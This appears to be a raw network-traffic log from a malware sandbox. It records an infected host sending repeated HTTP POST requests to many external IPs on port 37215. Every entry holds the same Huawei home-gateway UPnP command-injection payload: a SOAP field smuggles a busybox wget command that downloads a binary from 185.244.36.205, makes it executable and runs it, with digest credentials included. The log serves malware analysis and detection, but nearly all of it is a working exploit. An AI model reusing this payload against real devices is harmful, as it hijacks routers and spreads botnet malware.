                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2235192.168.2.1537028190.84.42.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.134392977 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2236192.168.2.1554870102.246.156.8837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.134504080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2237192.168.2.1545510102.239.215.14137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.134645939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2238192.168.2.1555648156.153.147.18937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.134733915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2239192.168.2.153586694.39.113.837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.357403040 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2240192.168.2.1553186122.183.152.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.357424974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2241192.168.2.154847094.153.197.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.357455969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2242192.168.2.1551226181.94.53.24937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.357475042 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2243192.168.2.1543484138.45.236.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.357496977 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2244192.168.2.1536794157.12.156.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.357546091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
